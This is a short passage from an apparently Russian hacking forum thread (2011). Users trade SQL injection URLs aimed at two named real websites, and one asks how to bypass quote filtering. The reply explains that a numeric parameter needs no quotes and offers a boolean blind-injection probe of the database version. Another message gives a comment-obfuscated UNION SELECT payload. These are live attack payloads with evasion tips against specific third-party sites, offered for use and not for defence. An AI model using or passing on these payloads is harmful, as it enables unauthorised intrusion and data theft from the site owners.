11.03.2011, 20:18
|
|
Участник форума
Регистрация: 27.08.2010
Сообщений: 154
С нами:
8268086
Репутация:
7
|
|
Сообщение от asql
http://www.hawkingtech.com/products/index.php?CatID=-32+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
идет фильтрация кавычек...
как можно обойти?
заранее спс
а кавычки тут и не нужны, параметр-то числовой
почему не работает юнион:
http://www.hawkingtech.com/products/index.php?CatID=32+and+substring(version(),1,1)=3 true
Сообщение от asql
и вот еще интересная
http://www.mibf.ru/index.php?id=99999/**//*!union*//**//*!select*/1,2,3,4,5,6,7,8,9,10/*
помимо гета есть еще и пост
|
|
|